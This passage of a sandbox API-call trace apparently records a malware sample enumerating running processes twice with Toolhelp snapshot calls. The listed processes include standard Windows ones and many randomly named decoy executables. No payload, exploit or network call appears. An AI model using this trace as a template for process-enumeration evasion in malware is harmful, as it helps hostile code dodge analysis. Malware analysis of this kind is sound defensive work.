dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0139.043] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0139.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0139.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0139.076] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0139.077] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0139.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0139.079] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.082] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0139.084] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.085] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.086] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0139.087] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0139.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0139.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0139.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0139.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0139.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0139.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0139.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0139.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0139.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0139.149] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0139.150] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0139.152] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0139.153] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0139.155] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0139.156] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0139.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0139.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0139.160] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0139.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0139.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0139.165] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0139.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0139.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0139.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0139.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0139.173] CloseHandle (hObject=0xbc) returned 1 [0139.173] Sleep (dwMilliseconds=0x12c) [0139.561] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0139.567] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0139.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0139.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.570] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0139.570] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.571] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0139.572] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0139.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0139.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0139.574] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.576] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.577] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.577] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0139.578] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.579] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.579] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0139.581] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.582] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.584] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0139.585] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0139.587] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0139.589] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.590] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.592] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0139.593] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0139.653] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0139.654] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0139.656] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0139.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0139.659] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0139.660] 